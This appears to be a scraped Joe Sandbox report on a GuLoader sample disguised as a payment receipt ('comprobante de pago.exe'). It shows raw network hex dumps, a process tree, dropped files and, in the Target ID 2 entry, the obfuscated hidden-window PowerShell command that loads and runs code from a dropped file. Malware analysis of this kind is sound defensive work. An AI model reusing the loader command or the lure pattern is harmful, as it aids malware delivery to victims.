2025-03-12 11:41:41 UTC	1378	IN	Data Raw: c7 a4 ff f9 97 97 2b 8f 91 25 e5 bb 1d ff bf 44 69 d5 82 3c a3 4d e3 53 fa cd 57 b9 89 ee b0 1d 19 fb 44 f2 6f 1b 33 98 9b 00 38 43 06 b4 56 33 a6 88 0d 44 03 de 2b a1 e9 5f 1e 4d 4b 9d e6 5d 8a 7a cc 93 d5 b0 de 20 3e a7 25 5c cc 94 a9 e6 d0 0a 8c 12 a0 e0 1e cd f3 77 55 05 26 54 4b 88 52 34 d9 69 39 c7 9c f4 9a cd 70 e2 0c 00 c9 c1 d6 91 de 0d 84 41 f4 15 f0 fa d7 fd 04 cf 59 b3 ad 5b cb 76 3f c5 95 cb 77 4d 92 c0 ac 48 d4 b5 aa d7 a5 72 7b 41 21 18 f7 ff ae 8b 27 97 df 12 3f 89 01 fe 31 2c bc d8 f3 56 ef 62 96 4e 09 8b c4 82 78 eb 5d 05 89 b2 cf 09 d5 d0 b7 c1 c6 41 b6 b9 49 f9 ca 52 9b 42 27 aa eb 94 49 39 43 35 7e 61 d9 fd 29 34 c8 05 ad 77 fc 9d ca e1 49 96 a3 bc 38 dc 86 70 6f cd 4c 49 40 18 e8 ea 44 e2 7a a0 24 f6 98 0a e1 ce 80 8b d3 6b cc 68 9e Data Ascii: +%Di<MSWDo38CV3D+_MK]z >%\wU&TKR4i9pAY[v?wMHr{A!'?1,VbNx]AIRB'I9C5~a)4wI8poLI@Dz$kh
2025-03-12 11:41:41 UTC	1378	IN	Data Raw: ef b5 51 e0 c2 ae b7 d5 50 86 79 b2 f8 2b fa 78 98 1c 37 19 be 31 80 2a d2 b8 cc a2 19 2d cd 06 68 c4 59 9e fc 97 b4 18 ef 77 c1 57 b2 e8 90 50 fc 6c a4 5c f3 54 4d f1 e3 58 46 6d 57 8c 59 03 a8 c1 ba 0d e5 69 d6 6b ac 61 d1 ef 0b 63 89 34 03 f4 b5 91 15 07 c7 5a 7b 1b bb 81 40 c3 55 07 ea c7 85 83 bc a6 39 85 49 34 33 a6 cd 62 fd fe 0c ea 08 70 44 a8 24 8a 65 a8 51 a7 e6 99 91 24 89 89 c1 52 4f 0e f8 fb cc 66 8b 3c 13 9a 71 82 70 b8 74 90 14 ac 56 5e 99 6a 7a 93 34 ac 22 aa 1a 64 a2 1f 02 54 b3 c9 89 b1 0b 02 5d 89 d8 84 39 cd 29 70 fa 00 49 e6 e0 5c 0d 1c a3 0e 67 2d 36 c2 f1 f9 cc 00 df 48 d4 77 2b 23 52 ce 46 4c 45 a8 d8 18 6e 8d 78 7a 37 5b 4c 9f ad 0b d8 a7 b0 4b 4b e7 79 76 af 3b c0 3d 3f d8 8d f3 35 b1 52 ba 66 65 26 05 79 26 54 fe df 29 e6 9a 32 Data Ascii: QPy+x71*-hYwWPl\TMXFmWYikac4Z{@U9I43bpD$eQ$ROf<qptV^jz4"dT]9)pI\g-6Hw+#RFLEnxz7[LKKyv;=?5Rfe&y&T)2
2025-03-12 11:41:41 UTC	1378	IN	Data Raw: f3 a4 ef cc 2f 9e 2c 08 a0 70 85 66 28 1f 80 e3 16 bf 0c b9 6d b5 de a0 28 f9 a4 96 94 83 c4 45 37 d3 09 95 e8 d8 93 e3 b7 57 eb 33 de ad fc 5c 63 ea e3 17 52 66 22 c0 c0 82 45 51 7b ad 89 cd 4f 9f a5 8e 36 5c 00 3a 97 59 7d 9f c9 61 6c 27 14 58 ae ee 12 a6 76 63 f7 6b ff e8 da 0b 83 47 4b 48 f3 ff 7a 61 5f c4 82 c1 11 ca 0d fe 2f dc 6e 94 c6 8c 88 b8 9d ae a8 12 82 51 79 f2 d1 39 cb e9 34 a8 7a 08 81 23 95 6b bb 44 29 79 a7 0b de 39 19 65 3d 22 04 da 35 ca ea 48 7c 34 3a 16 47 4b f7 a8 ac 07 8f f2 85 4c f1 88 76 92 86 9a f0 bf d8 34 a5 8c 13 5e ab 4d f3 f5 97 43 b9 9c 06 6e 97 5b 58 ae 3c f9 bf d4 7e 4a d9 26 b7 68 85 95 b7 2a f6 c4 d4 d8 d5 bc 82 6f 18 99 bb 4a 76 95 22 84 ef 0e 8c 91 53 64 6a 11 1a 68 cc 0c 71 a9 a9 d3 92 51 c2 a4 a8 55 d1 74 ca e7 5e Data Ascii: /,pf(m(E7W3\cRf"EQ{O6\:Y}al'XvckGKHza_/nQy94z#kD)y9e="5H\|4:GKLv4^MCn[X<~J&h*oJv"SdjhqQUt^
2025-03-12 11:41:41 UTC	1378	IN	Data Raw: cf b9 c0 b9 c3 52 c5 42 48 aa 28 d4 7f 39 08 35 1b 61 97 bd 2a 34 b6 05 fc 77 64 a2 dd e1 19 96 ef bc c0 e3 b1 70 02 cd 01 49 5f 27 c6 ea 2c e2 10 a0 95 c8 93 0a 5a cf 80 8b 3b 50 ac 68 9e fe 3a 8e d1 dd 4b b8 53 79 10 51 d8 13 0c 1e 27 f0 4e d9 43 c3 bd c1 64 68 90 2a 34 eb 76 6f 0e e8 ab 0a 1f ea f9 23 3b a1 92 51 ea f4 17 75 56 ca 38 5f 80 29 53 33 f9 1a 22 af 94 e5 20 b9 96 8a fe 57 0c 54 56 25 6a 0f 05 c0 2a ff fa c8 aa 85 1f 11 a5 39 fc 6c 3e df 38 41 2e db 99 38 89 6b 30 54 90 1a 3e 1c 19 69 5e 87 0f a8 a2 42 be 73 12 8a 95 1c 43 3a 2b 91 d2 9a f7 d5 1e 55 7a e4 38 b5 29 c0 d6 97 ed f8 6b dd 6c 25 54 00 bd 66 e8 fb b8 de da 00 f4 e2 ca 22 17 7a 38 0e 00 46 3c dc fd ef 77 b7 ee 13 6f da b4 54 f3 fe 3a c9 d4 7c 55 a5 d7 c9 83 13 a4 9b 00 1f e5 79 bd Data Ascii: RBH(95a4wdpI_',Z;Ph:KSyQ'NCdh4vo#;QuV8_)S3" WTV%j*9l>8A.8k0T>i^BsC:+Uz8)kl%Tf"z8F<woT:\|Uy
2025-03-12 11:41:41 UTC	1378	IN	Data Raw: 36 2b ba 71 cc 00 9c 3a ad 07 5f 70 e7 ea 4e 29 30 38 f9 6a f0 1f 87 85 37 5b 74 d4 2d 5b d7 ec a5 f1 5a 29 11 50 49 22 19 8a 8a f3 d6 8b 28 a9 58 ba c3 1d 77 46 7d 2d a8 b6 9d d6 06 f2 52 5b 9f 8f 33 9b de 0f 91 a0 17 67 d5 f0 cb be 73 e5 d1 d7 ef 66 98 3e 52 08 05 0d f6 a5 46 7a bd d5 8c 55 36 f7 58 4e d1 9c 55 7f 6d 05 a3 3e 95 8e ab fb 73 2e 30 3b a8 40 c6 3f 7d ef 0c 85 8b 12 3b 85 96 d2 ac 6a 64 35 60 b1 90 5b dd 78 b7 33 01 2d 9a 0c a8 f6 08 ce b4 c2 ba d6 77 c3 4f 2f 93 96 08 68 46 cc 0b 12 3e 70 ae b5 c7 a3 e0 15 ee 99 a0 4f 5c b4 f1 ad 42 b8 31 43 b5 6d b0 fb 88 d7 70 2d 20 92 a6 44 29 17 8d dc d3 81 6c 03 89 74 f9 5c 1b 66 0c 18 82 da 01 83 1c 25 84 9b c3 3c 34 d9 79 90 9a 94 94 87 05 5d 98 2e d8 4f 57 77 bb ef f6 4b 04 bf 63 dd ae 55 8c 6d eb Data Ascii: 6+q:_pN)08j7[t-[Z)PI"(XwF}-R[3gsf>RFzU6XNUm>s.0;@?};jd5`[x3-wO/hF>pO\B1Cmp- D)lt\f%<4y].OWwKcUm

Target ID:	0
Start time:	07:39:34
Start date:	12/03/2025
Path:	C:\Users\user\Desktop\comprobante de pago.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\comprobante de pago.exe"
Imagebase:	0x400000
File size:	839'098 bytes
MD5 hash:	969DA5CC61A21E2D5FD00A52254ECD8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.880916593.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:39:35
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"
Imagebase:	0x50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1510713122.0000000006133000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1515536979.0000000008560000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1517575876.000000000AB40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:39:35
Start date:	12/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6e60e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:40:11
Start date:	12/03/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff66acf0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	07:40:41
Start date:	12/03/2025
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0xd50000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.2073983602.00000000044E0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report comprobante de pago.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aqd1gfdv.vhd.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e04skr4l.c01.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2ugaecg.yhf.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ly44lvx2.wd3.ps1

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Haandevendinger.ini

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Halfman.ini

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Mordvaabnets.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Preadmonition20.ove

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Tonation.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Vuggevisens.tid

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\alderney.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\assuranceselskabets.jpg

C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\coater.jpg

Windows Analysis Report
comprobante de pago.exe